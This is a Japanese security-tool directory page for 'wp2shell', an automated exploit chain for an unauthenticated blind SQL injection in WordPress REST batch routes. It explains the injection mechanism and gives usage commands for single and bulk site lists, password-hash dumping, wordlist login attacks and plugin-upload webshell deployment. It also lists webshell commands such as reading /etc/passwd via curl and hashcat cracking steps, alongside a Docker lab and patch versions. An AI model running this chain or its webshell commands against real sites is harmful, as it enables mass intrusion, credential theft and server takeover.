Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wp2shell — CVE-2026-63030 / CVE-2026-60137 の自動エクスプロイトチェーン — WordPress REST バッチルート混乱による認証不要のブラインドSQLi。ユーザーハッシュをダンプし、資格情報を解析し、Webシェルを展開します。単一ターゲットおよびバルクサイトリストに対応。許可されたセキュリティテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/0xwhoknows/wp2shell
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストレッドチーミング
GitHub0xwhoknows/wp2shell

wp2shell

CVE-2026-63030 / CVE-2026-60137 の自動エクスプロイトチェーン — WordPress REST バッチルート混乱による認証不要のブラインドSQLi。ユーザーハッシュをダンプし、資格情報を解析し、Webシェルを展開します。単一ターゲットおよびバルクサイトリストに対応。許可されたセキュリティテストのみを対象としています。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

wp2shell

WordPress RESTバッチルート混乱ブラインドSQLインジェクション — 自動エクスプロイトチェーン。

CVE-2026-63030 / CVE-2026-60137

影響を受けるバージョンWordPress 6.9.0 – 6.9.4 and 7.0.0 – 7.0.1
修正バージョンWordPress 6.9.5 / 7.0.2
注入箇所author__not_in SQL via desync'd author_exclude parameter
認証要件不要(未認証SQLi)

許可されたセキュリティテストのみを対象としています。


動作原理

WordPress REST APIのバッチエンドポイント(/wp-json/batch/v1)は、ネストされたバッチリクエストを許可します。二重ネストされたデシンクペイロードにより、内部の$matches / $validation配列がシフトされ、細工されたauthor_exclude値がサニタイズなしでauthor__not_in SQLにルーティングされます。これにより、未認証のブラインドブール型+時間ベースSQLインジェクションが可能になります。

エクスプロイトチェーン — 4フェーズ:

root@kitploit:~
Phase 1  Vulnerability check     batch marker probe + optional SQL timing
Phase 2  Hash harvest            blind SQLi extracts wp_users (login + hash)
Phase 3  Authentication          wordlist attack via wp-login.php
Phase 4  Webshell deployment     plugin ZIP upload -> RCE verify

必要条件

  • Python 3.8+
  • aiohttp
  • colorama
root@kitploit:~
pip install aiohttp colorama

使用方法

単一ターゲット

root@kitploit:~
python wp2shell.py http://target.com

サイトリスト(1行に1URL)

root@kitploit:~
python wp2shell.py sites.txt

サイトリスト+カスタムパスワードファイル

root@kitploit:~
python wp2shell.py sites.txt -p pass.txt

既知の認証情報(ワードリストをスキップ)

root@kitploit:~
python wp2shell.py http://target.com --user admin --password admin123

タイミングでSQLiを確認

root@kitploit:~
python wp2shell.py http://target.com --confirm-sqli

パーマリンクなし

root@kitploit:~
python wp2shell.py http://target.com --rest-route

Burpプロキシ経由

root@kitploit:~
python wp2shell.py http://target.com --proxy http://127.0.0.1:8080

オプション


出力ファイル

ファイル内容
creds.txthttp://target=>user:pass(解読された場合は平文、そうでない場合はハッシュ)
webshell.txt有効なウェブシェルURL
VULNERABLE.txtフェーズ1で脆弱性が確認された全てのターゲット

すべてのファイルは追記されます — 結果は実行ごとに蓄積されます。

ウェブシェルの使用 — webshell.txt内のURLに?cmd=COMMANDを追加:

root@kitploit:~
# browser
http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id

# curl
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id"
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=cat+/etc/passwd"

オフラインクラッキング

ワードリストで見つからない場合、creds.txtに抽出されたハッシュが含まれています:

root@kitploit:~
hashcat -m 400 creds.txt wordlist.txt

次に、解読されたパスワードで再実行:

root@kitploit:~
python wp2shell.py http://target.com --user admin --password <plaintext>

ローカルラボ(Docker)

安全なローカルテスト用に脆弱なWordPress 7.0.1インスタンスを起動します。

初回実行 — ボリュームをビルドしWordPressをインストール:

root@kitploit:~
docker compose up -d db wordpress
docker compose run --rm wpcli

2回目以降の起動:

root@kitploit:~
docker compose up -d db wordpress

停止:

root@kitploit:~
docker compose down

完全リセット(全データ消去):

root@kitploit:~
docker compose down -v

ラボに対してエクスプロイトを実行:

root@kitploit:~
python wp2shell.py http://localhost:8080

パッチ

WordPress 6.9.5 または 7.0.2 にアップデートしてください。修正により、ネストされたリクエストをディスパッチする前にバッチルートを検証し、SQL注入箇所を露出させるデシンクを防ぎます。


法的注意

あなたが所有しているか、明示的な書面によるテスト許可を得ているシステムでのみ使用してください。無許可の使用は違法です。

ツールをダウンロード
フラグデフォルト説明
target—URL(http://target)またはサイトリストファイルへのパス
-p FILE—パスワードリストファイル(1行に1つ)
--user—ワードリストをスキップし、このユーザー名を使用
--password—ワードリストをスキップし、このパスワードを使用
--confirm-sqlioffマーカーチェック後にアクティブなSQLタイミングプローブを送信
--rest-routeoff/?rest_route=/batch/v1を使用(パーマリンクなし)
--sleep N3.0SQL SLEEP() 遅延時間(秒)
--samples N3中央値計算のためのタイミングサンプルペア数
--timeout N30.0HTTPリクエストタイムアウト
--prefix PREFIXwp_データベーステーブルプレフィックス
--proxy URL—HTTP/HTTPSプロキシ
URLhttp://localhost:8080
管理者admin / admin123
MySQLホストdb
MySQLユーザー/パスワードwpuser / wppass
データベースwordpress